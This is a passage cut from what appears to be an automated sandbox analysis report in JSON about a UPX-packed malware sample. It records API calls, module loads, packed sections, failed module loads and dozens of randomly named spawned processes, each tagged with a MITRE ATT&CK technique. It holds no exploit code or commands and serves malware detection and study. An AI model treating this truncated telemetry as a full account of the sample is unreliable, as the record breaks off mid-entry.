\"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005188)\n \"xrnbdjd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005188)\n \"xrnbdjd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005188)\n \"xrnbdjd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005188)\n \"jrfxlf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004648)\n \"jrfxlf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004648)\n \"jrfxlf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004648)\n \"jrfxlf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004648)\n \"8844064.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006120)\n \"8844064.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006120)\n \"8844064.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006120)\n \"8844064.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006120)\n \"pxjrr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006092)\n \"pxjrr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006092)\n \"pxjrr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006092)\n \"pxjrr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006092)\n \"bnjjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003796)\n \"bnjjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003796)\n \"bnjjv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003796)\n \"bnjjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003796)\n \"626400.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005072)\n \"626400.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005072)\n \"626400.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005072)\n \"626400.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005072)\n \"880202.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003228)\n \"880202.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003228)\n \"880202.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003228)\n \"880202.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003228)\n \"nvrtbh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003680)\n \"nvrtbh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003680)\n \"nvrtbh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003680)\n \"nvrtbh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003680)\n \"dppbn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003260)\n \"dppbn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003260)\n \"dppbn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003260)\n \"dppbn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003260)\n \"xvnnn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003456)\n \"xvnnn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003456)\n \"xvnnn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003456)\n \"xvnnn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003456)\n \"fbtltj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000692)\n \"fbtltj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000692)\n \"fbtltj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000692)\n \"fbtltj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000692)\n \"0080208.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000656)\n \"0080208.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000656)\n \"0080208.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000656)\n \"0080208.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000656)\n \"thntdfd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002152)\n \"thntdfd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002152)\n \"thntdfd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002152)\n \"thntdfd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002152)\n \"xxlthnt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000608)\n \"xxlthnt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000608)\n \"xxlthnt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000608)\n \"xxlthnt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000608)\n \"vldfrx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003448)\n \"vldfrx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003448)\n \"vldfrx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003448)\n \"vldfrx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003448)\n \"4288806.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001656)\n \"4288806.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001656)\n \"4288806.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001656)\n \"4288806.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001656)\n \"8024466.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000708)\n \"8024466.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000708)\n \"8024466.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000708)\n \"8024466.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000708)\n \"xrfpvx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001844)\n \"xrfpvx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001844)\n \"xrfpvx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001844)\n \"xrfpvx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001844)\n \"0824600.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003028)\n \"0824600.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003028)\n \"0824600.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003028)\n \"0824600.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003028)\n \"8280068.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003416)\n \"8280068.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003416)\n \"8280068.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003416)\n \"8280068.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003416)\n \"284486.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001408)\n \"284486.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001408)\n \"284486.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001408)\n \"284486.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001408)\n \"4088420.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005572)\n \"4088420.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005572)\n \"4088420.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005572)\n \"4088420.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005572)\n \"6466820.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000704)\n \"6466820.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000704)\n \"6466820.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000704)\n \"6466820.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000704)\n \"ntnbrnr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002172)\n \"ntnbrnr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002172)\n \"ntnbrnr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002172)\n \"ntnbrnr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002172)\n \"hbrjl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003064)\n \"hbrjl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003064)\n \"hbrjl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003064)\n \"hbrjl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003064)\n \"bhbtd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004032)\n \"bhbtd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004032)\n \"bhbtd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004032)\n \"bhbtd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004032)\n \"lpftbf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002812)\n \"lpftbf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002812)\n \"lpftbf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002812)\n \"lpftbf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002812)\n \"fnttpf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003776)\n \"fnttpf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003776)\n \"fnttpf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003776)\n \"fnttpf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003776)\n \"24026.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002876)\n \"24026.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002876)\n \"24026.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002876)\n \"24026.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002876)\n \"02488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001332)\n \"02488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001332)\n \"02488.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001332)\n \"02488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001332)\n \"02488.exe\" called \"LoadLibrary\" with a parameter KERNEL32.DLL (UID: 00000000-00001332)\n \"02488.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00001332)\n \"02488.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00001332)\n \"02488.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00001332)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"242680.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"06484.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"26802.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"06224.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"xrnbdjd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"njljtn.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"xvdbp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"plfthj.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"jrfxlf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"8844064.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"pxjrr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"bnjjv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"626400.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"882066.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"880202.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"nvrtbh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"hnbnnnb.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"dppbn.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"dxrftlp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"xvnnn.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"ftvfbtx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"rxvhlp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"fbtltj.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000\n \"0064284.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76030000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0\" has an writable section named \"UPX0\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0\" has an writable section named \"UPX1\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0\" has an writable section named \"UPX2\"\n \"fvxfr.exe\" has an writable section named \"UPX0\"\n \"fvxfr.exe\" has an writable section named \"UPX1\"\n \"fvxfr.exe\" has an writable section named \"UPX2\"\n \"fpnhxpp.exe\" has an writable section named \"UPX0\"\n \"fpnhxpp.exe\" has an writable section named \"UPX1\"\n \"fpnhxpp.exe\" has an writable section named \"UPX2\"\n \"dlnbh.exe\" has an writable section named \"UPX0\"\n \"dlnbh.exe\" has an writable section named \"UPX1\"\n \"dlnbh.exe\" has an writable section named \"UPX2\"\n \"jfjjpnn.exe\" has an writable section named \"UPX0\"\n \"jfjjpnn.exe\" has an writable section named \"UPX1\"\n \"jfjjpnn.exe\" has an writable section named \"UPX2\"\n \"bttxlfh.exe\" has an writable section named \"UPX0\"\n \"bttxlfh.exe\" has an writable section named \"UPX1\"\n \"bttxlfh.exe\" has an writable section named \"UPX2\"\n \"hlphd.exe\" has an writable section named \"UPX0\"\n \"hlphd.exe\" has an writable section named \"UPX1\"\n \"hlphd.exe\" has an writable section named \"UPX2\"\n \"8664860.exe\" has an writable section named \"UPX0\"\n \"8664860.exe\" has an writable section named \"UPX1\"\n \"8664860.exe\" has an writable section named \"UPX2\"\n \"868480.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0\" has an executable section named \"UPX0\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0\" has an executable section named \"UPX1\"\n \"fvxfr.exe\" has an executable section named \"UPX0\"\n \"fvxfr.exe\" has an executable section named \"UPX1\"\n \"fpnhxpp.exe\" has an executable section named \"UPX0\"\n \"fpnhxpp.exe\" has an executable section named \"UPX1\"\n \"dlnbh.exe\" has an executable section named \"UPX0\"\n \"dlnbh.exe\" has an executable section named \"UPX1\"\n \"jfjjpnn.exe\" has an executable section named \"UPX0\"\n \"jfjjpnn.exe\" has an executable section named \"UPX1\"\n \"bttxlfh.exe\" has an executable section named \"UPX0\"\n \"bttxlfh.exe\" has an executable section named \"UPX1\"\n \"hlphd.exe\" has an executable section named \"UPX0\"\n \"hlphd.exe\" has an executable section named \"UPX1\"\n \"8664860.exe\" has an executable section named \"UPX0\"\n \"8664860.exe\" has an executable section named \"UPX1\"\n \"868480.exe\" has an executable section named \"UPX0\"\n \"868480.exe\" has an executable section named \"UPX1\"\n \"44822.exe\" has an executable section named \"UPX0\"\n \"44822.exe\" has an executable section named \"UPX1\"\n \"06066.exe\" has an executable section named \"UPX0\"\n \"06066.exe\" has an executable section named \"UPX1\"\n \"lxvrdvn.exe\" has an executable section named \"UPX0\"\n \"lxvrdvn.exe\" has an executable section named \"UPX1\"\n \"dlvbt.exe\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"242680.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"242680.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"26802.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"26802.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xrnbdjd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xrnbdjd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jrfxlf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jrfxlf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8844064.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8844064.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pxjrr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pxjrr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"bnjjv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"bnjjv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"626400.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"626400.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"880202.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"880202.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nvrtbh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nvrtbh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dppbn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dppbn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xvnnn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xvnnn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fbtltj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fbtltj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"0080208.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0080208.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"thntdfd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"thntdfd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xxlthnt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xxlthnt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vldfrx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vldfrx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4288806.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4288806.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8024466.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8024466.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xrfpvx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xrfpvx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"0824600.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0824600.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8280068.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8280068.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"284486.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"284486.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4088420.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4088420.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"6466820.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6466820.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ntnbrnr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ntnbrnr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hbrjl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hbrjl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"bhbtd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"bhbtd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lpftbf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lpftbf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fnttpf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fnttpf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"24026.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"24026.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"02488.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"02488.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"242680.exe\" (UID: 00000000-00005352)\n Spawned process \"06484.exe\" (UID: 00000000-00003928)\n Spawned process \"26802.exe\" (UID: 00000000-00004268)\n Spawned process \"06224.exe\" (UID: 00000000-00005168)\n Spawned process \"xrnbdjd.exe\" (UID: 00000000-00005188)\n Spawned process \"njljtn.exe\" (UID: 00000000-00002220)\n Spawned process \"xvdbp.exe\" (UID: 00000000-00002116)\n Spawned process \"plfthj.exe\" (UID: 00000000-00005664)\n Spawned process \"jrfxlf.exe\" (UID: 00000000-00004648)\n Spawned process \"8844064.exe\" (UID: 00000000-00006120)\n Spawned process \"pxjrr.exe\" (UID: 00000000-00006092)\n Spawned process \"bnjjv.exe\" (UID: 00000000-00003796)\n Spawned process \"626400.exe\" (UID: 00000000-00005072)\n Spawned process \"882066.exe\" (UID: 00000000-00003232)\n Spawned process \"880202.exe\" (UID: 00000000-00003228)\n Spawned process \"nvrtbh.exe\" (UID: 00000000-00003680)\n Spawned process \"hnbnnnb.exe\" (UID: 00000000-00000132)\n Spawned process \"dppbn.exe\" (UID: 00000000-00003260)\n Spawned process \"dxrftlp.exe\" (UID: 00000000-00002444)\n Spawned process \"xvnnn.exe\" (UID: 00000000-00003456)\n Spawned process \"ftvfbtx.exe\" (UID: 00000000-00001852)\n Spawned process \"rxvhlp.exe\" (UID: 00000000-00003500)\n Spawned process \"fbtltj.exe\" (UID: 00000000-00000692)\n Spawned process \"0064284.exe\" (UID: 00000000-00001856)\n Spawned process \"484088.exe\" (UID: 00000000-00005740)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": 